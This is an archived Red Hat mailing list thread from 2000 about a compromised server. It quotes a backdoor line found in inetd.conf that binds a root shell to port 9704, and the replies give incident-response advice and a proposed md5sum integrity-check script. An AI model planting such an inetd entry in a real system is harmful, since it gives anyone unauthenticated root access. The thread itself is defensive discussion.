I was just thinking. I know there's trip wire and stuff. but it would be
neat to have cron run a script, that did md5sum "checks" on various things,
and mailed you, if the sum changed on anything that's in it's list. Anyone
have anything like that? I know practicly nothing about scripting, but how
hard would that be to write? Seems like it would go something like this:
For every file in /etc/this_script's.conf, do "$file /path/to/md5sum" >
/var/log/today's_copy. and diff /var/log/today's_copy against
/var/log/yesterday's_copy, if today's_copy != yesterday's_copy, mail root
OTH maybe I'm just silly ;-)
JW
>I thought I'd check out my inetd.conf too. I'd been looking
>at the log files daily, and I was usnig "snort" to
>watch for suspicious activity (mind you, I'm little
>more than a mere novice)
>
>Same damn line. Looks like I know what I'm doing this
>weekend.... and learning IPCHAINS.
>
>Thanks, all. I would probably have never thought to look
>there.
>
>Mark
>
>
> >
> > Message: 2> Message: 3
> > Date: Mon, 11 Sep 2000 16:22:58 -0500
> > From: "Michael R. Jinks" <[EMAIL PROTECTED]>
> > To: [EMAIL PROTECTED]
> > Subject: Re: highly suspicious line in inetd.conf
> > Reply-To: [EMAIL PROTECTED]
> >
> > On Mon, Sep 11, 2000 at 02:04:37PM -0700, wYRd wrote:
> > >
> > > Looking over a clients system I found the following
> > > line in inetd.con:
> > > 9704 stream tcp nowait root /bin/sh sh -i
> >
> > EEK!
> >
> > > telnet to the port and instant root access.
> >
> > Yup.
> >
> > > A quick look around didn't reveal any obvious
> > > problems. I'm worred about the non-obvious
> > > now.
> >
> > Good man.
> >
> > > any suggestions for things to do and places
> > > to poke into would be appreciated.
> >
> > Well...
> >
> > > (is it likely the system was compromsied for
> > > future use?)
> >
> > I'd say so, yes. And in that case all bets are off; they
> > could have left
> > behind just about anything as a back door or other malicious
> > stuff, the only
> > way you can really be sure they're gone (whoever "they" are)
> > is to reinstall
> > from bare metal. :(
> >
> > Don't really know what your setup is like or how long they've
> > owned your box,
> > but hopefully you've kept good logs and backups of your
> > system so that you can
> > have some idea of when the inetd.conf file was compromised
> > (do old backup
> > versions of the file have that line as well? how far back?)
> > and can then
> > cross-reference to that date in your old log files. But even
> > then all you'd
> > get would be some indication of when and how they got in, and
> > maybe some clues
> > about what they did once they got there. It's almost
> > impossible to guarantee
> > that you've undone the damage unless you were running
> > tripwire or some other
> > equivalent.
> >
> > This is a pretty klutzy way of owning a system, whoever did
> > this was either
> > (a) not real slick or (b) not at all concerned about being
> > the only person
> > who could own your box. But that doesn't mean that they
> > didn't hide their
> > tracks well elsewhere. Best bet is to take the machine down
> > (at least off
> > the network), secure any vital data, wipe it, and start over. Sorry.
> >
> > Cheers,
> > -m
> > --
> > Michael Jinks, IB
> > Systems Administrator, CCCP
> > finger [EMAIL PROTECTED] for public key
> > Vote Duke! http://www.entertaindom.com/pages/duke2000/home.jsp
> >
> > >
>
>
>
>_______________________________________________
>Redhat-list mailing list
>[EMAIL PROTECTED]
>https://listman.redhat.com/mailman/listinfo/redhat-list
_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list
